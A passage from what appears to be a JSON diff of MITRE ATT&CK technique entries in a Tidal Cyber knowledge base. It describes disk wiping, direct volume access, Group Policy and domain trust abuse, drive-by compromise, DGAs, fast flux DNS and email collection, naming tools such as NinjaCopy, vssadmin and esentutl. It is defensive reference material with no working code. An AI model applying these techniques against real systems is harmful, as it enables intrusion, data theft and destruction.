Drivers](https://app.tidalcyber.com/references/4bde767e-d4a7-56c5-9aa3-b3f3cc2e3e70)]\n\nOn Linux/macOS, device drivers (in the form of kernel modules) may be visible within `/dev` or using utilities such as `lsmod` and `modinfo`.[[Linux Kernel Programming](https://app.tidalcyber.com/references/70f31f19-e0b3-40b1-b8dd-6667557bb334)][[lsmod man](https://app.tidalcyber.com/references/c2f88274-9da4-5d24-b68d-302ee5990dd5)][[modinfo man](https://app.tidalcyber.com/references/d4f2db5c-ef6d-556d-a5e2-f6738277fecd)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "70ffc700-eb9b-54d7-8fd4-564bd71a6434", + "value": "Device Driver Discovery" + }, + { + "description": "Adversaries may directly access a volume to bypass file access controls and file system monitoring. Windows allows programs to have direct access to logical volumes. Programs with direct access may read and write files directly from the drive by analyzing file system data structures. This technique may bypass Windows file access controls as well as file system monitoring tools. [[Hakobyan 2009](https://app.tidalcyber.com/references/d92f6dc0-e902-4a4a-9083-8d1667a7003e)]\n\nUtilities, such as `NinjaCopy`, exist to perform these actions in PowerShell.[[Github PowerSploit Ninjacopy](https://app.tidalcyber.com/references/e92aed6b-348b-4dab-8292-fee0698e4a85)] Adversaries may also use built-in or third-party utilities (such as `vssadmin`, `wbadmin`, and [esentutl](https://app.tidalcyber.com/software/a7589733-6b04-4215-a4e7-4b62cd4610fa)) to create shadow copies or backups of data from system volumes.[[LOLBAS Esentutl](https://app.tidalcyber.com/references/691b4907-3544-4ad0-989c-b5c845e0330f)]", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "447f1d32-31f7-44b5-834a-dcba8b038e7f", + "value": "Direct Volume Access" + }, + { + "description": "Adversaries may erase the contents of storage devices on specific systems or in large numbers in a network to interrupt availability to system and network resources.\n\nAdversaries may partially or completely overwrite the contents of a storage device rendering the data irrecoverable through the storage interface.[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)][[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)][[DOJ Lazarus Sony 2018](https://app.tidalcyber.com/references/950f8c1e-8793-43b7-abc7-0c9f6790b3b7)] Instead of wiping specific disk structures or files, adversaries with destructive intent may wipe arbitrary portions of disk content. To wipe disk content, adversaries may acquire direct access to the hard drive in order to overwrite arbitrarily sized portions of disk with random data.[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)] Adversaries have also been observed leveraging third-party drivers like [RawDisk](https://app.tidalcyber.com/software/d86a562d-d235-4481-9a3f-273fa3ebe89a) to directly access disk content.[[Novetta Blockbuster](https://app.tidalcyber.com/references/bde96b4f-5f98-4ce5-a507-4b05d192b6d7)][[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)] This behavior is distinct from [Data Destruction](https://app.tidalcyber.com/technique/e5016c2b-85fe-4e6b-917d-0dd5b441cc34) because sections of the disk are erased instead of individual files.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disk content may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1561.001" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "761fa7fa-d7e1-4796-85b3-5cd37d55dffa", + "value": "Disk Content Wipe" + }, + { + "description": "Adversaries may corrupt or wipe the disk data structures on a hard drive necessary to boot a system; targeting specific critical systems or in large numbers in a network to interrupt availability to system and network resources. \n\nAdversaries may attempt to render the system unable to boot by overwriting critical data located in structures such as the master boot record (MBR) or partition table.[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)][[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)][[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)][[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)][[Unit 42 Shamoon3 2018](https://app.tidalcyber.com/references/c2148166-faf4-4ab7-a37e-deae0c88c08d)] The data contained in disk structures may include the initial executable code for loading an operating system or the location of the file system partitions on disk. If this information is not present, the computer will not be able to load an operating system during the boot process, leaving the computer unavailable. [Disk Structure Wipe](https://app.tidalcyber.com/technique/14a944d3-ab95-40d8-b069-ccc4824ef46d) may be performed in isolation, or along with [Disk Content Wipe](https://app.tidalcyber.com/technique/761fa7fa-d7e1-4796-85b3-5cd37d55dffa) if all sectors of a disk are wiped.\n\nOn a network devices, adversaries may reformat the file system using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `format`.[[format_cmd_cisco](https://app.tidalcyber.com/references/9442e08d-0858-5aa5-b642-a6b1e46018bc)]\n\nTo maximize impact on the target organization, malware designed for destroying disk structures may have worm-like features to propagate across a network by leveraging other techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).[[Symantec Shamoon 2012](https://app.tidalcyber.com/references/ac634e99-d951-402b-bb1c-e575753dfda8)][[FireEye Shamoon Nov 2016](https://app.tidalcyber.com/references/44b2eb6b-4902-4ca0-80e5-7333d620e075)][[Palo Alto Shamoon Nov 2016](https://app.tidalcyber.com/references/15007a87-a281-41ae-b203-fdafe02a885f)][[Kaspersky StoneDrill 2017](https://app.tidalcyber.com/references/e2637cb3-c449-4609-af7b-ac78a900cc8b)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1561.002" + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + } + ], + "uuid": "14a944d3-ab95-40d8-b069-ccc4824ef46d", + "value": "Disk Structure Wipe" + }, + { + "description": "Adversaries may wipe or corrupt raw disk data on specific systems or in large numbers in a network to interrupt availability to system and network resources. With direct write access to a disk, adversaries may attempt to overwrite portions of disk data. Adversaries may opt to wipe arbitrary portions of disk data and/or wipe disk structures like the master boot record (MBR). A complete wipe of all disk sectors may be attempted.\n\nTo maximize impact on the target organization in operations where network-wide availability interruption is the goal, malware used for wiping disks may have worm-like features to propagate across a network by leveraging additional techniques like [Valid Accounts](https://app.tidalcyber.com/technique/a9b7eb2f-63e7-41bc-9d77-f7c4cede5406), [OS Credential Dumping](https://app.tidalcyber.com/technique/368f85f9-2b15-4732-80fe-087694eaf34d), and [SMB/Windows Admin Shares](https://app.tidalcyber.com/technique/bc2f2c6c-ffe7-4e78-bbac-369f6781bbdd).[[Novetta Blockbuster Destructive Malware](https://app.tidalcyber.com/references/de278b77-52cb-4126-9341-5b32843ae9f1)]\n\nOn network devices, adversaries may wipe configuration files and other data from the device using [Network Device CLI](https://app.tidalcyber.com/technique/284bfbb3-99f0-4c3d-bc1f-ab74065b7907) commands such as `erase`.[[erase_cmd_cisco](https://app.tidalcyber.com/references/4c90eba9-118e-5d50-ad58-27bcb0e1e228)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Network", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "52c0edbc-ce4d-429a-b1d5-720403e0172f", + "type": "uses" + }, + { + "dest-uuid": "761fa7fa-d7e1-4796-85b3-5cd37d55dffa", + "type": "similar" + }, + { + "dest-uuid": "14a944d3-ab95-40d8-b069-ccc4824ef46d", + "type": "similar" + } + ], + "uuid": "ea2b3980-05fd-41a3-8ab9-3106e833c821", + "value": "Disk Wipe" + }, + { + "description": "Adversaries may add new domain trusts or modify the properties of existing domain trusts to evade defenses and/or elevate privileges. Domain trust details, such as whether or not a domain is federated, allow authentication and authorization properties to apply between domains for the purpose of accessing shared resources.[[Microsoft - Azure AD Federation](https://app.tidalcyber.com/references/fedb345f-b5a7-40cd-98c7-6b14bab95ed9)] These trust objects may include accounts, credentials, and other authentication material applied to servers, tokens, and domains.\n\nManipulating the domain trusts may allow an adversary to escalate privileges and/or evade defenses by modifying settings to add objects which they control. For example, this may be used to forge [SAML Tokens](https://app.tidalcyber.com/technique/dc0aecef-3cb2-4381-b6e4-dfa7be16d42b), without the need to compromise the signing certificate to forge new credentials. Instead, an adversary can manipulate domain trusts to add their own signing certificate. An adversary may also convert a domain to a federated domain, which may enable malicious trust modifications such as altering the claim issuance rules to log in any valid set of credentials as a specified user.[[AADInternals zure AD Federated Domain](https://app.tidalcyber.com/references/d2005eb6-4da4-4938-97fb-caa0e2381f4e)] ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1484.002" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "f534b0a6-4445-409a-889c-6c3ac34656f1", + "value": "Domain Trust Modification" + }, + { + "description": "Adversaries may modify Group Policy Objects (GPOs) to subvert the intended discretionary access controls for a domain, usually with the intention of escalating privileges on the domain. Group policy allows for centralized management of user and computer settings in Active Directory (AD). GPOs are containers for group policy settings made up of files stored within a predictable network path `\\\\SYSVOL\\\\Policies\\`.[[TechNet Group Policy Basics](https://app.tidalcyber.com/references/9b9c8c6c-c272-424e-a594-a34b7bf62477)][[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)] \n\nLike other objects in AD, GPOs have access controls associated with them. By default all user accounts in the domain have permission to read GPOs. It is possible to delegate GPO access control permissions, e.g. write access, to specific users or groups in the domain.\n\nMalicious GPO modifications can be used to implement many other malicious behaviors such as [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8), [Disable or Modify Tools](https://app.tidalcyber.com/technique/9f290216-b2ab-47b5-b9ae-a94ae6d357c6), [Ingress Tool Transfer](https://app.tidalcyber.com/technique/4499ce34-9871-4879-883c-19ddb940f242), [Create Account](https://app.tidalcyber.com/technique/55bcf759-a0bf-47e9-99f8-4e8ca997e6ce), [Service Execution](https://app.tidalcyber.com/technique/68427c7d-f65a-4545-abfd-13d69e5e50cf), and more.[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)][[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)][[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)][[Mandiant M Trends 2016](https://app.tidalcyber.com/references/f769a3ac-4330-46b7-bed8-61697e22cd24)][[Microsoft Hacking Team Breach](https://app.tidalcyber.com/references/8daac742-6467-40db-9fe5-87efd2a96f09)] Since GPOs can control so many user and machine settings in the AD environment, there are a great number of potential attacks that can stem from this GPO abuse.[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)]\n\nFor example, publicly available scripts such as New-GPOImmediateTask can be leveraged to automate the creation of a malicious [Scheduled Task/Job](https://app.tidalcyber.com/technique/0baf02af-ffaa-403f-9f0d-da51f463a1d8) by modifying GPO settings, in this case modifying <GPO_PATH>\\Machine\\Preferences\\ScheduledTasks\\ScheduledTasks.xml.[[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)][[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)] In some cases an adversary might modify specific user rights like SeEnableDelegationPrivilege, set in <GPO_PATH>\\MACHINE\\Microsoft\\Windows NT\\SecEdit\\GptTmpl.inf, to achieve a subtle AD backdoor with complete control of the domain because the user account under the adversary's control would then be able to modify GPOs.[[Harmj0y SeEnableDelegationPrivilege Right](https://app.tidalcyber.com/references/e8f7df08-1a62-41d9-b8a4-ff39a2160294)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1484.001" + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + } + ], + "uuid": "7c9035b8-ad4b-4441-be2b-823d86b54fac", + "value": "Group Policy Modification" + }, + { + "description": "Adversaries may modify the configuration settings of a domain to evade defenses and/or escalate privileges in domain environments. Domains provide a centralized means of managing how computer resources (ex: computers, user accounts) can act, and interact with each other, on a network. The policy of the domain also includes configuration settings that may apply between domains in a multi-domain/forest environment. Modifications to domain settings may include altering domain Group Policy Objects (GPOs) or changing trust settings for domains, including federation trusts.\n\nWith sufficient permissions, adversaries can modify domain policy settings. Since domain configuration settings control many of the interactions within the Active Directory (AD) environment, there are a great number of potential attacks that can stem from this abuse. Examples of such abuse include modifying GPOs to push a malicious [Scheduled Task](https://app.tidalcyber.com/technique/723c6d51-91db-4658-9ee0-eafb953c2d82) to computers throughout the domain environment[[ADSecurity GPO Persistence 2016](https://app.tidalcyber.com/references/e304715f-7da1-4342-ba5b-d0387d93aeb2)][[Wald0 Guide to GPOs](https://app.tidalcyber.com/references/48bb84ac-56c8-4840-9a11-2cc76213e24e)][[Harmj0y Abusing GPO Permissions](https://app.tidalcyber.com/references/18cc9426-9b51-46fa-9106-99688385ebe4)] or modifying domain trusts to include an adversary controlled domain where they can control access tokens that will subsequently be accepted by victim domain resources.[[Microsoft - Customer Guidance on Recent Nation-State Cyber Attacks](https://app.tidalcyber.com/references/47031992-841f-4ef4-87c6-bb4c077fb8dc)] Adversaries can also change configuration settings within the AD environment to implement a [Rogue Domain Controller](https://app.tidalcyber.com/technique/c5eb5b88-6c62-4900-9b14-c4d67d420002).\n\nAdversaries may temporarily modify domain policy, carry out a malicious action(s), and then revert the change to remove suspicious indicators.", + "meta": { + "platforms": [ + "Azure AD", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "b17dde68-dbcf-4cfd-9bb8-be014ec65c37", + "type": "uses" + }, + { + "dest-uuid": "8e29c6c9-0c10-4bb0-827d-ff0ab8922726", + "type": "uses" + }, + { + "dest-uuid": "f534b0a6-4445-409a-889c-6c3ac34656f1", + "type": "similar" + }, + { + "dest-uuid": "7c9035b8-ad4b-4441-be2b-823d86b54fac", + "type": "similar" + } + ], + "uuid": "d092a9e1-63d0-415d-8cd0-666a261be5d9", + "value": "Domain Policy Modification" + }, + { + "description": "Adversaries may attempt to gather information on domain trust relationships that may be used to identify lateral movement opportunities in Windows multi-domain/forest environments. Domain trusts provide a mechanism for a domain to allow access to resources based on the authentication procedures of another domain.[[Microsoft Trusts](https://app.tidalcyber.com/references/e6bfc6a8-9eea-4c65-9c2b-04749da72a92)] Domain trusts allow the users of the trusted domain to access resources in the trusting domain. The information discovered may help the adversary conduct [SID-History Injection](https://app.tidalcyber.com/technique/dcb323f0-0fe6-4e26-9039-4f26f10cd3a5), [Pass the Ticket](https://app.tidalcyber.com/technique/5e771f38-6286-4330-b7b4-38071ad6b68a), and [Kerberoasting](https://app.tidalcyber.com/technique/2f980aed-b34a-4300-ac6b-70e7ddf6d9be).[[AdSecurity Forging Trust Tickets](https://app.tidalcyber.com/references/09d3ccc1-cd8a-4675-88c0-84110f5b8e8b)][[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)] Domain trusts can be enumerated using the `DSEnumerateDomainTrusts()` Win32 API call, .NET methods, and LDAP.[[Harmj0y Domain Trusts](https://app.tidalcyber.com/references/23a9ef6c-9f71-47bb-929f-9a92f24553eb)] The Windows utility [Nltest](https://app.tidalcyber.com/software/fbb1546a-f288-4e43-9e5c-14c94423c4f6) is known to be used by adversaries to enumerate domain trusts.[[Microsoft Operation Wilysupply](https://app.tidalcyber.com/references/567ce633-a061-460b-84af-01dfe3d818c7)]", + "meta": { + "platforms": [ + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "ee7e5a85-a940-46e4-b408-12956f3baafa", + "type": "uses" + } + ], + "uuid": "93bd112e-9494-4b60-bdc5-8b610c7ebe21", + "value": "Domain Trust Discovery" + }, + { + "description": "Adversaries may gain access to a system through a user visiting a website over the normal course of browsing. With this technique, the user's web browser is typically targeted for exploitation, but adversaries may also use compromised websites for non-exploitation behavior such as acquiring [Application Access Token](https://app.tidalcyber.com/technique/8592f37d-850a-43d1-86f2-cc981ad7d7dc).\n\nMultiple ways of delivering exploit code to a browser exist (i.e., [Drive-by Target](https://app.tidalcyber.com/technique/f2661f07-9027-4d19-9028-d07b7511f3d5)), including:\n\n* A legitimate website is compromised where adversaries have injected some form of malicious code such as JavaScript, iFrames, and cross-site scripting\n* Script files served to a legitimate website from a publicly writeable cloud storage bucket are modified by an adversary\n* Malicious ads are paid for and served through legitimate ad providers (i.e., [Malvertising](https://app.tidalcyber.com/technique/60ac24aa-ce63-5c1d-8126-db20a27d85be))\n* Built-in web application interfaces are leveraged for the insertion of any other kind of object that can be used to display web content or contain a script that executes on the visiting client (e.g. forum posts, comments, and other user controllable web content).\n\nOften the website used by an adversary is one visited by a specific community, such as government, a particular industry, or region, where the goal is to compromise a specific user or set of users based on a shared interest. This kind of targeted campaign is often referred to a strategic web compromise or watering hole attack. There are several known examples of this occurring.[[Shadowserver Strategic Web Compromise](https://app.tidalcyber.com/references/cf531866-ac3c-4078-b847-5b4af7eb161f)]\n\nTypical drive-by compromise process:\n\n1. A user visits a website that is used to host the adversary controlled content.\n2. Scripts automatically execute, typically searching versions of the browser and plugins for a potentially vulnerable version. \n * The user may be required to assist in this process by enabling scripting or active website components and ignoring warning dialog boxes.\n3. Upon finding a vulnerable version, exploit code is delivered to the browser.\n4. If exploitation is successful, then it will give the adversary code execution on the user's system unless other protections are in place.\n * In some cases a second visit to the website after the initial scan is required before exploit code is delivered.\n\nUnlike [Exploit Public-Facing Application](https://app.tidalcyber.com/technique/4695fd01-43a5-4aa9-ab1a-501fc0dfbd6a), the focus of this technique is to exploit software on a client endpoint upon visiting a website. This will commonly give an adversary access to systems on the internal network instead of external systems that may be in a DMZ.\n\nAdversaries may also use compromised websites to deliver a user to a malicious application designed to [Steal Application Access Token](https://app.tidalcyber.com/technique/f78f2c87-626a-468f-93a5-31b61be17727)s, like OAuth tokens, to gain access to protected applications and information. These malicious applications have been delivered through popups on legitimate websites.[[Volexity OceanLotus Nov 2017](https://app.tidalcyber.com/references/ed9f5545-377f-4a12-92e4-c0439cc5b037)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "SaaS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "586a5b49-c566-4a57-beb4-e7c667f9c34c", + "type": "uses" + } + ], + "uuid": "d4e46fe1-cc6d-4ef0-af72-a4e8dcd71381", + "value": "Drive-by Compromise" + }, + { + "description": "Adversaries may perform calculations on addresses returned in DNS results to determine which port and IP address to use for command and control, rather than relying on a predetermined port number or the actual returned IP address. A IP and/or port number calculation can be used to bypass egress filtering on a C2 channel.[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)]\n\nOne implementation of [DNS Calculation](https://app.tidalcyber.com/technique/e9cc000d-174e-4e6c-9513-a0c000061700) is to take the first three octets of an IP address in a DNS response and use those values to calculate the port for command and control traffic.[[Meyers Numbered Panda](https://app.tidalcyber.com/references/988dfcfc-0c16-4129-9523-a77539291951)][[Moran 2014](https://app.tidalcyber.com/references/15ef155b-7628-4b18-bc53-1d30be4eac5d)][[Rapid7G20Espionage](https://app.tidalcyber.com/references/2235ff2a-07b8-4198-b91d-e50739e274f4)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1568.003" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "e9cc000d-174e-4e6c-9513-a0c000061700", + "value": "DNS Calculation" + }, + { + "description": "Adversaries may make use of Domain Generation Algorithms (DGAs) to dynamically identify a destination domain for command and control traffic rather than relying on a list of static IP addresses or domains. This has the advantage of making it much harder for defenders to block, track, or take over the command and control channel, as there potentially could be thousands of domains that malware can check for instructions.[[Cybereason Dissecting DGAs](https://app.tidalcyber.com/references/9888cdb6-fe85-49b4-937c-75005ac9660d)][[Cisco Umbrella DGA](https://app.tidalcyber.com/references/5dbe2bcb-40b9-4ff8-a37a-0893a7a6cb58)][[Unit 42 DGA Feb 2019](https://app.tidalcyber.com/references/5e1db76a-0a3e-42ce-a66c-f914fb1a3471)]\n\nDGAs can take the form of apparently random or “gibberish” strings (ex: istgmxdejdnxuyla.ru) when they construct domain names by generating each letter. Alternatively, some DGAs employ whole words as the unit by concatenating words together instead of letters (ex: cityjulydish.net). Many DGAs are time-based, generating a different domain for each time period (hourly, daily, monthly, etc). Others incorporate a seed value as well to make predicting future domains more difficult for defenders.[[Cybereason Dissecting DGAs](https://app.tidalcyber.com/references/9888cdb6-fe85-49b4-937c-75005ac9660d)][[Cisco Umbrella DGA](https://app.tidalcyber.com/references/5dbe2bcb-40b9-4ff8-a37a-0893a7a6cb58)][[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)][[Akamai DGA Mitigation](https://app.tidalcyber.com/references/5b14cdf6-261a-4d7e-acb4-74e7fafa9467)]\n\nAdversaries may use DGAs for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server malware may employ a DGA as a means to reestablishing command and control.[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)][[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)][[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1568.002" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "b0be2e07-e4b4-4f1a-8fce-c7a1e820a817", + "value": "Domain Generation Algorithms" + }, + { + "description": "Adversaries may use Fast Flux DNS to hide a command and control channel behind an array of rapidly changing IP addresses linked to a single domain resolution. This technique uses a fully qualified domain name, with multiple IP addresses assigned to it which are swapped with high frequency, using a combination of round robin IP addressing and short Time-To-Live (TTL) for a DNS resource record.[[MehtaFastFluxPt1](https://app.tidalcyber.com/references/5f169cae-6b59-4879-9a8f-93fdcea5cc58)][[MehtaFastFluxPt2](https://app.tidalcyber.com/references/f8a98e55-c91e-4b5e-b6f3-0065ef07375d)][[Fast Flux - Welivesecurity](https://app.tidalcyber.com/references/e232d739-663e-4878-b13b-9248cd81e657)]\n\nThe simplest, \"single-flux\" method, involves registering and de-registering an addresses as part of the DNS A (address) record list for a single DNS name. These registrations have a five-minute average lifespan, resulting in a constant shuffle of IP address resolution.[[Fast Flux - Welivesecurity](https://app.tidalcyber.com/references/e232d739-663e-4878-b13b-9248cd81e657)]\n\nIn contrast, the \"double-flux\" method registers and de-registers an address as part of the DNS Name Server record list for the DNS zone, providing additional resilience for the connection. With double-flux additional hosts can act as a proxy to the C2 host, further insulating the true source of the C2 channel.", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1568.001" + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + } + ], + "uuid": "abae30c8-c6b0-46ae-b464-44b66412065f", + "value": "Fast Flux DNS" + }, + { + "description": "Adversaries may dynamically establish connections to command and control infrastructure to evade common detections and remediations. This may be achieved by using malware that shares a common algorithm with the infrastructure the adversary uses to receive the malware's communications. These calculations can be used to dynamically adjust parameters such as the domain name, IP address, or port number the malware uses for command and control.\n\nAdversaries may use dynamic resolution for the purpose of [Fallback Channels](https://app.tidalcyber.com/technique/be8786b3-cd3d-47ef-a9e7-cd3ab3c901a1). When contact is lost with the primary command and control server malware may employ dynamic resolution as a means to reestablishing command and control.[[Talos CCleanup 2017](https://app.tidalcyber.com/references/f2522cf4-dc65-4dc5-87e3-9e88212fcfe9)][[FireEye POSHSPY April 2017](https://app.tidalcyber.com/references/b1271e05-80d7-4761-a13f-b6f0db7d7e5a)][[ESET Sednit 2017 Activity](https://app.tidalcyber.com/references/406e434e-0602-4a08-bbf6-6d72311a720e)]", + "meta": { + "platforms": [ + "Linux", + "macOS", + "Windows" + ], + "source": "MITRE", + "tags": [] + }, + "related": [ + { + "dest-uuid": "94ffe549-1c29-438d-9c7f-e27f7acee0bb", + "type": "uses" + }, + { + "dest-uuid": "e9cc000d-174e-4e6c-9513-a0c000061700", + "type": "similar" + }, + { + "dest-uuid": "b0be2e07-e4b4-4f1a-8fce-c7a1e820a817", + "type": "similar" + }, + { + "dest-uuid": "abae30c8-c6b0-46ae-b464-44b66412065f", + "type": "similar" + } + ], + "uuid": "987ad3da-9423-4fe0-a52b-b931c0b8b95f", + "value": "Dynamic Resolution" + }, + { + "description": "Adversaries may setup email forwarding rules to collect sensitive information. Adversaries may abuse email forwarding rules to monitor the activities of a victim, steal information, and further gain intelligence on the victim or the victim’s organization to use as part of further exploits or operations.[[US-CERT TA18-068A 2018](https://app.tidalcyber.com/references/d9992f57-8ff3-432f-b445-937ff4a6ebf9)] Furthermore, email forwarding rules can allow adversaries to maintain persistent access to victim's emails even after compromised credentials are reset by administrators.[[Pfammatter - Hidden Inbox Rules](https://app.tidalcyber.com/references/8a00b664-5a75-4365-9069-a32e0ed20a80)] Most email clients allow users to create inbox rules for various email functions, including forwarding to a different recipient. These rules may be created through a local email application, a web interface, or by command-line interface. Messages can be forwarded to internal or external recipients, and there are no restrictions limiting the extent of this rule. Administrators may also create forwarding rules for user accounts with the same considerations and outcomes.[[Microsoft Tim McMichael Exchange Mail Forwarding 2](https://app.tidalcyber.com/references/b5bf8e12-0133-46ea-85e3-b48c9901b518)][[Mac Forwarding Rules](https://app.tidalcyber.com/references/0ff40575-cd2d-4a70-a07b-fff85f520062)]\n\nAny user or administrator within the organization (or adversary with valid credentials) can create rules to automatically forward all received messages to another recipient, forward emails to different locations based on the sender, and more. Adversaries may also hide the rule by making use of the Microsoft Messaging API (MAPI) to modify the rule properties, making it hidden and not visible from Outlook, OWA or most Exchange Administration tools.[[Pfammatter - Hidden Inbox Rules](https://app.tidalcyber.com/references/8a00b664-5a75-4365-9069-a32e0ed20a80)]\n\nIn some environments, administrators may be able to enable email forwarding rules that operate organization-wide rather than on individual inboxes. For example, Microsoft Exchange supports transport rules that evaluate all mail an organization receives against user-specified conditions, then performs a user-specified action on mail that adheres to those conditions.[[Microsoft Mail Flow Rules 2023](https://app.tidalcyber.com/references/421093d7-6ac8-5ebc-9a04-1c65bdce0980)] Adversaries that abuse such features may be able to enable forwarding on all or specific mail an organization receives. ", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1114.003" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "59db734e-9edb-4c92-b2ca-a72fe1e08ac7", + "value": "Email Forwarding Rule" + }, + { + "description": "Adversaries may target user email on local systems to collect sensitive information. Files containing email data can be acquired from a user’s local system, such as Outlook storage or cache files.\n\nOutlook stores data locally in offline data files with an extension of .ost. Outlook 2010 and later supports .ost file sizes up to 50GB, while earlier versions of Outlook support up to 20GB.[[Outlook File Sizes](https://app.tidalcyber.com/references/6fbbb53f-cd4b-4ce1-942d-5cadb907cf86)] IMAP accounts in Outlook 2013 (and earlier) and POP accounts use Outlook Data Files (.pst) as opposed to .ost, whereas IMAP accounts in Outlook 2016 (and later) use .ost files. Both types of Outlook data files are typically stored in `C:\\Users\\\\Documents\\Outlook Files` or `C:\\Users\\\\AppData\\Local\\Microsoft\\Outlook`.[[Microsoft Outlook Files](https://app.tidalcyber.com/references/29f4cc6b-1fa5-434d-ab4f-6bb169e2287a)]", + "meta": { + "source": "MITRE", + "technique_attack_id": "T1114.001" + }, + "related": [ + { + "dest-uuid": "1ca65327-b553-4923-ae19-8e6987ca250a", + "type": "uses" + } + ], + "uuid": "9a388756-9de0-45ea-9820-810443733789", + "value": "Local Email Collection" + }, + { + "description": "Adversaries may target an Exchange server, Office 365, or Google Workspace to collect sensitive information. Adversaries may leverage a user's credentials and interact directly with the Exchange server to acquire information from within a network. Adversaries may also access externally facing Exchange services, Office 365, or Google 